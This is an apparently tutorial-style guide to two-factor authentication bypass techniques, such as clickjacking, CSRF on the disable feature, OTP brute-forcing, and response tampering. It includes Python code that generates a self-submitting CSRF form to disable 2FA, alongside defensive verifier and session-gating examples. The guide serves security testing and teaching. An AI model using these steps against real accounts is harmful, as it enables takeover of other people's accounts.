Multi-Factor Authentication (2FA) Bypass

What is Multi-Factor Authentication?

Multi-factor authentication (MFA) is a security process that requires users to present two or more independent proofs of identity before they can access an account or system. It adds a layer of protection beyond the username and password, so that a stolen or guessed password alone is not enough to gain access.

The factors MFA draws on fall into the following categories:

1: Something You Know

This is usually a password or a PIN that only the user should know. It’s the traditional authentication method used in most systems.

2: Something You Have

This could be a physical device, such as a smartphone, a smart card, or a hardware token, which generates a one-time code or holds a private key and digital certificate that only that device can use.

3: Something You Are

This refers to biometric factors such as fingerprint scans, facial recognition, or iris scans. Biometric authentication adds an additional layer of security by verifying unique physical characteristics.

By combining two or more of these factors, MFA significantly enhances security compared to relying solely on passwords, which can be vulnerable to various threats like phishing, brute-force attacks, or credential theft.

Can Multi-Factor Authentication Be Bypassed?

Yes. When the second factor is implemented or enforced carelessly, 2FA can be bypassed in many ways. Note that all of the techniques below assume the attacker already has the first factor (the victim's password) or a way to make the victim act; they defeat the second step, not the first.

MFA Bypass Techniques

Technique 1: Clickjacking on MFA/2FA Disable Functionality

Embed the Page: Load the page where users can turn off Multi-Factor Authentication (MFA) or Two-Factor Authentication (2FA) into an iframe on a page you control. The embed succeeds when the response carries neither an X-Frame-Options header (DENY or SAMEORIGIN) nor a Content-Security-Policy frame-ancestors directive that excludes your origin.

Trick the User: If the page can be framed, overlay it with decoy content so that a logged-in victim clicks the disable control without realising it. Before reporting, confirm that the disable action does not require the victim to re-enter the password or a current code; if it does, the click alone achieves nothing.
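The first step of this technique is deciding, from the captured response headers, whether the 2FA-disable page can be framed at all. The following is an added example (not code from the original article) that applies the rules browsers use: a CSP frame-ancestors directive wins over X-Frame-Options when both are present, ALLOW-FROM is obsolete and treated as no protection, and Content-Security-Policy-Report-Only is ignored because it does not block anything. The header sets in the main block are constructed test data; ports are not compared, which is a simplification.

```python
"""Added example: decide from captured response headers whether a page (such as
the 2FA-disable settings page) can be framed by an attacker-controlled origin."""
from urllib.parse import urlsplit


def origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def frame_ancestors(csp: str):
    """Return the frame-ancestors source list, or None if the directive is absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [s.lower() for s in parts[1:]] or ["'none'"]
    return None


def source_allows(src: str, attacker: str, target: str) -> bool:
    """Does one CSP source expression permit the `attacker` origin to frame `target`?"""
    if src == "'none'":
        return False
    if src == "*":
        return True
    if src == "'self'":
        return attacker == target
    a = urlsplit(attacker)
    if src.endswith(":") and "/" not in src:          # scheme source, e.g. https:
        return a.scheme == src[:-1]
    scheme, host = src.split("://", 1) if "://" in src else (None, src)
    if scheme and a.scheme != scheme:
        return False
    host = host.split(":")[0]                         # port comparison omitted (simplification)
    if host.startswith("*."):
        return a.hostname.endswith(host[1:])          # *.example.com does not match example.com itself
    return a.hostname == host


def frameable_by(headers: dict, page_url: str, attacker_url: str) -> bool:
    """True if a page served with `headers` at page_url can be put in an iframe
    on attacker_url, judging only from X-Frame-Options and CSP frame-ancestors."""
    h = {k.lower(): v for k, v in headers.items()}
    target, attacker = origin_of(page_url), origin_of(attacker_url)
    csp = h.get("content-security-policy")           # Report-Only variant deliberately ignored
    if csp is not None:
        allowed = frame_ancestors(csp)
        if allowed is not None:
            # When frame-ancestors is present the browser ignores X-Frame-Options entirely.
            return any(source_allows(s, attacker, target) for s in allowed)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return attacker == target
    # No header, an unrecognised value, or the obsolete ALLOW-FROM (ignored by
    # current browsers): treat the page as frameable, the conservative call for a tester.
    return True


if __name__ == "__main__":
    # constructed sample responses, not captured from any real site
    page, evil = "https://app.example/settings/2fa", "https://evil.example"
    for name, hdrs in {
        "no headers": {},
        "xfo deny": {"X-Frame-Options": "DENY"},
        "csp self+partner": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
        "allow-from only": {"X-Frame-Options": "ALLOW-FROM https://evil.example"},
    }.items():
        print(f"{name:18s} frameable by {evil}: {frameable_by(hdrs, page, evil)}")
```

Run it against the headers of the actual disable page; a `True` for your own origin means the embed step of the technique is possible and the rest of the test (the decoy overlay and the question of whether the disable action demands re-authentication) is worth doing.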

Technique 2: 2FA Code Leakage in Response

Capture the Request: When a request is made to trigger the Two-Factor Authentication (2FA) code, such as sending an OTP (One-Time Password) by SMS or email, intercept and record this request.

Analyze the Response: Check the body and headers of the response to this request to see whether the code itself is included, for example in a JSON field that was only meant to feed the SMS or email template. A code that is returned to the browser never needed the out-of-band channel, so anyone who can make the request can read it.

Technique 3: Response Manipulation

Inspect the response: Look at the response received after sending the Two-Factor Authentication (2FA) request.

Check for “Success”:false: See if the response indicates that the 2FA request was not successful.

Modify “Success” status: Change the “Success” status from false to true in the response to see if it allows bypassing the 2FA. This can be done manually or by using Burp Match & Replace Rules to automate the process. The bypass is real only if the server does not check the second factor on its own: after the client moves on, request an authenticated page and confirm that access actually sticks, since a correctly gated server will still refuse it.

Technique 4: JS File Analysis

Trigger the 2FA code request: Start the Two-Factor Authentication (2FA) flow so that the application serves the pages and scripts used for the second step.

Look at the JavaScript (JS) files: Check all the JS files referenced by the response you get back, including bundles that are only loaded for the 2FA step.

Search for bypass clues: Look for hard-coded or test codes, debug or “skip 2FA” flags, client-side validation of the code, and API endpoints that are reachable without the second step. Any of these can give you a way around the 2FA code.

Technique 5: Status Code Manipulation

Check the Response Status Code: Look at the status code in the response to a failed 2FA attempt, such as 401 or 403, which are in the 4XX range.

Modify the Status Code: If it’s a 4XX code, change it to “200 OK” and see if this action allows you to bypass the Two-Factor Authentication (2FA). As with response manipulation, this only succeeds when the client decides what happens next; verify that a subsequent request to an authenticated page is accepted.

Technique 6: Lack of Brute-Force Protection

Request 2FA code and record it: Start by asking for the Two-Factor Authentication (2FA) code and keep track of this request.

Repeat the request multiple times: Try sending the same request 100-200 times. If nothing stops you, there is no rate limit on code requests, which also means the victim can be flooded with messages.

Test 2FA code validity: When you reach the page where you need to enter the 2FA code, submit many different codes to see if you can hit a valid one. This is brute-forcing. A 6-digit numeric code has only 1,000,000 possible values, so without a limit on wrong attempts (or a lockout of the code after a few failures) guessing it is practical.

Explore simultaneous actions: If previously issued codes stay valid when a new one is requested, keep requesting codes on one side while brute-forcing on the other. Every outstanding code is another value a guess can hit, so the expected number of guesses needed shrinks in proportion to the number of live codes.

Technique 7: 2FA Code Reusability

Request and use a 2FA code: Start by asking for a Two-Factor Authentication (2FA) code and use it for authentication.

Attempt to reuse the same 2FA code: Try using the same 2FA code again. If it works a second time, there’s a problem.

Test code expiration: Request multiple 2FA codes and observe if previously requested codes become invalid when a new code is requested.

Test code reuse after a long time: Try reusing a previously issued code after a considerable duration, like a day or more. If it still works, that is a problem: a code that stays valid that long gives an attacker who intercepts or leaks it a far wider replay window than necessary, and it also widens the window for brute-forcing. OTPs should expire within minutes and be invalidated on first use.

Technique 8: Password Reset/Email Change Disables 2FA

Perform email change or password reset: Suppose you can change the email address associated with the victim’s account or reset their password, either directly or by convincing the victim to do it.

2FA is turned off after email or password change: After the email is changed or the password is reset, the Two-Factor Authentication (2FA) is automatically disabled. Whether this counts as a vulnerability depends on the application: for an attacker who already controls the reset flow (for example through a compromised mailbox), it is a clean way to strip the second factor from the account.

Technique 9: CSRF on 2FA Disable Feature

Go to the 2FA settings page and select “Disable”: Access the Two-Factor Authentication (2FA) settings page and choose the option to disable it. Use Burp Suite to capture this request and create a CSRF (Cross-Site Request Forgery) Proof of Concept (PoC). Check whether the captured request carries an anti-CSRF token or a custom header that a cross-site form cannot supply, and whether the session cookie is marked SameSite; if so, the PoC will fail.

Send the PoC to the victim: Share the CSRF PoC with the victim user and verify if the CSRF successfully triggers, leading to the removal of 2FA from their account.
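What Burp’s PoC generator does for this technique can be reproduced in a few lines, which also makes the protection check explicit. The following is an added example, not code from the original article: it parses a captured request, emits a self-submitting HTML form, and lists the signs (token-like parameters, custom headers, a JSON body) that the form would not get past the server. The request in the block is constructed sample data with an assumed host and path.

```python
"""Added example: turn a captured 2FA-disable request into a self-submitting
HTML CSRF proof of concept, and list the signs that the request is protected."""
import html
from urllib.parse import parse_qsl, urlsplit

# Constructed sample request (assumed host, path and cookie value).
SAMPLE_REQUEST = """\
POST /settings/2fa/disable HTTP/1.1
Host: app.example
Cookie: session=0123456789abcdef
Content-Type: application/x-www-form-urlencoded

confirm=yes&reason=lost+phone
"""


def parse_raw_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), path, headers, body.strip()


def request_params(method, path, headers, body):
    """Parameters a plain HTML form could reproduce, or None if it cannot."""
    if method == "GET":
        return parse_qsl(urlsplit(path).query, keep_blank_values=True)
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return parse_qsl(body, keep_blank_values=True)
    return None  # JSON or multipart bodies are not replayable with a simple form


def csrf_poc(raw: str, scheme: str = "https") -> str:
    method, path, headers, body = parse_raw_request(raw)
    params = request_params(method, path, headers, body)
    if params is None or method not in ("GET", "POST"):
        raise ValueError("only GET and form-encoded POST requests can be replayed by a plain HTML form")
    action = f"{scheme}://{headers['host']}{urlsplit(path).path}"
    fields = "\n".join(
        f'    <input type="hidden" name="{html.escape(n, quote=True)}" value="{html.escape(v, quote=True)}">'
        for n, v in params
    )
    return (
        "<html><body>\n"
        f'  <form id="poc" action="{html.escape(action, quote=True)}" method="{method}">\n'
        f"{fields}\n"
        "  </form>\n"
        '  <script>document.getElementById("poc").submit();</script>\n'
        "</body></html>\n"
    )


def csrf_indicators(raw: str) -> list:
    """Reasons the PoC would probably fail. SameSite cookie attributes are set in
    the response, so they cannot be judged from the request alone."""
    method, path, headers, body = parse_raw_request(raw)
    found = []
    for name, _ in request_params(method, path, headers, body) or []:
        if any(k in name.lower() for k in ("csrf", "xsrf", "token", "authenticity", "nonce")):
            found.append(f"param:{name}")
    for name in headers:
        if name.startswith("x-"):               # custom headers are not sent by a cross-site form
            found.append(f"header:{name}")
    if headers.get("content-type", "").startswith("application/json"):
        found.append("content-type:json")       # not a simple request: needs a CORS preflight
    return found


if __name__ == "__main__":
    print("indicators:", csrf_indicators(SAMPLE_REQUEST) or "none (worth testing)")
    print(csrf_poc(SAMPLE_REQUEST))
```

An empty indicator list is not proof of a vulnerability: the session cookie may carry SameSite=Lax or Strict, which you can only see in the Set-Cookie response header, and the only conclusive test is the one the technique describes, loading the PoC in a browser that is logged in as the victim.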

Technique 10: Missing 2FA Code Integrity Validation

Get a 2FA code from the Attacker Account: Start by obtaining a valid Two-Factor Authentication (2FA) code from the Attacker Account.

Try using this code in the victim’s 2FA request: Attempt to use the obtained 2FA code in the victim’s 2FA request to check if it successfully bypasses the 2FA protection.
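Techniques 6, 7 and 10 all probe the same piece of server logic: how the issued code is stored and checked. The following is an added example, not code from the original article, showing a verifier that passes those checks (codes bound to the account, single use, short expiry, a new request replaces the old code, a limit on wrong attempts, constant-time comparison) next to a naive one that keeps a single global pool of valid codes and fails every one of them. `issue()` returns the code only so the example runs offline; a real service delivers it out of band and never echoes it in the HTTP response. The account names and attempt limits are assumptions for illustration.

```python
"""Added example: an OTP verifier that resists brute-force, reuse and
cross-account submission, next to a naive one that does not."""
import hmac
import secrets
import time


class NaiveOtpService:
    """One global pool of valid codes: any code works for any user, codes never
    expire, stay valid after use, and there is no attempt limit. Every extra
    request for a code adds another value a brute-force guess can hit."""

    def __init__(self):
        self.valid_codes = set()

    def issue(self, user: str) -> str:
        code = f"{secrets.randbelow(10**6):06d}"
        self.valid_codes.add(code)
        return code

    def verify(self, user: str, submitted: str) -> bool:
        return submitted in self.valid_codes


class OtpService:
    CODE_TTL = 300          # seconds a code stays valid (assumed value)
    MAX_ATTEMPTS = 5        # wrong guesses before the pending code is discarded (assumed value)

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable so expiry can be tested without waiting
        self._pending = {}           # user -> {"code", "expires", "attempts"}

    def issue(self, user: str) -> str:
        code = f"{secrets.randbelow(10**6):06d}"
        # A new code replaces the old one, so only one code is ever live per user.
        self._pending[user] = {"code": code, "expires": self._clock() + self.CODE_TTL, "attempts": 0}
        return code

    def verify(self, user: str, submitted: str) -> bool:
        entry = self._pending.get(user)      # looked up by account: another user's code cannot match
        if entry is None:                    # nothing issued, expired, used, or locked out
            return False
        if self._clock() > entry["expires"]:
            del self._pending[user]
            return False
        entry["attempts"] += 1
        ok = hmac.compare_digest(entry["code"].encode(), str(submitted).encode())
        if ok or entry["attempts"] >= self.MAX_ATTEMPTS:
            del self._pending[user]          # single use; too many failures burn the code as well
        return ok


if __name__ == "__main__":
    naive, svc = NaiveOtpService(), OtpService()
    code = naive.issue("alice")
    print("naive: bob submits alice's code ->", naive.verify("bob", code))
    code = svc.issue("alice")
    print("hardened: first use ->", svc.verify("alice", code), "reuse ->", svc.verify("alice", code))
```

The attempt counter is stored with the pending code rather than with the client, so retrying from a different IP address or session does not reset it; throttling the code-request endpoint itself (the “100-200 times” check in Technique 6) is a separate control that sits in front of `issue()`.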

Technique 11: Backup Code Abuse

Apply the same methods used against the Two-Factor Authentication (2FA) code, such as manipulating responses and status codes, brute-forcing, and reusing codes, to the backup (recovery) codes that let a user deactivate or reset 2FA. Backup codes are often longer-lived than OTPs, so check in particular that each one is invalidated after use and that wrong attempts are limited.

Technique 12: Direct Request

With a session that has completed only the password step, request the page that normally comes after Two-Factor Authentication (2FA), or any other authenticated page or API endpoint of the application, directly by URL.

Check if this bypasses the 2FA restrictions and grants access without the second step. If it does, the server tracks only that the password was accepted and leaves the second factor to the client’s navigation, which is the same weakness that response and status code manipulation exploit.
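Techniques 3, 5 and 12 succeed or fail on one server-side decision: whether the handler for a post-2FA page checks that the second step was completed for this session, or only that a password was accepted. The following is an added example, not code from the original article, modelling that decision with an in-memory session; the user record, password and OTP are constructed test data. `attacker_flow` plays the attacker who has the victim’s password but not the code: the 2FA response says success=false, and whether that response is tampered with or simply ignored makes no difference, because the next request to the dashboard is what the server actually decides on.

```python
"""Added example: the same login flow behind a post-2FA page that is gated
correctly and one that trusts the client to have finished 2FA."""
import hmac
from dataclasses import dataclass

# Constructed test data (assumed user, password and one-time code).
USERS = {"alice": {"password": "correct horse battery", "otp": "492817"}}


@dataclass
class Session:
    """Server-side session state; the client only ever holds an opaque cookie."""
    user: str = ""
    password_ok: bool = False
    mfa_ok: bool = False


def login(session: Session, user: str, password: str) -> dict:
    rec = USERS.get(user)
    if rec and hmac.compare_digest(rec["password"].encode(), password.encode()):
        session.user, session.password_ok, session.mfa_ok = user, True, False
        return {"success": True, "next": "/mfa"}
    return {"success": False}


def verify_mfa(session: Session, code: str) -> dict:
    if not session.password_ok:
        return {"success": False}
    if hmac.compare_digest(USERS[session.user]["otp"].encode(), code.encode()):
        session.mfa_ok = True               # the only place this flag is ever set
        return {"success": True, "next": "/dashboard"}
    return {"success": False}               # what the attacker rewrites to true on the wire


def dashboard_vulnerable(session: Session) -> int:
    # Checks only that a password was accepted; whether /mfa was completed is
    # left to the client's navigation. Flipping "success" in the 2FA response,
    # rewriting its status code, or requesting /dashboard straight after the
    # password step all reach this line with password_ok set.
    return 200 if session.password_ok else 401


def dashboard_hardened(session: Session) -> int:
    if not session.password_ok:
        return 401
    if not session.mfa_ok:
        return 403                          # second factor not completed for this session
    return 200


def attacker_flow(dashboard) -> int:
    """Attacker who knows the password but not the code, then skips to the dashboard."""
    s = Session()
    if not login(s, "alice", "correct horse battery")["success"]:
        raise RuntimeError("constructed credentials should log in")
    verify_mfa(s, "000000")                 # wrong code; server-side state stays mfa_ok=False
    return dashboard(s)


if __name__ == "__main__":
    print("vulnerable gate:", attacker_flow(dashboard_vulnerable))   # 200: bypass
    print("hardened gate:  ", attacker_flow(dashboard_hardened))     # 403: blocked
```

Note that `login()` resets `mfa_ok` to False: a session that re-authenticates with the password has to complete the second step again, which also closes the variant where an old session flag survives a password change.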
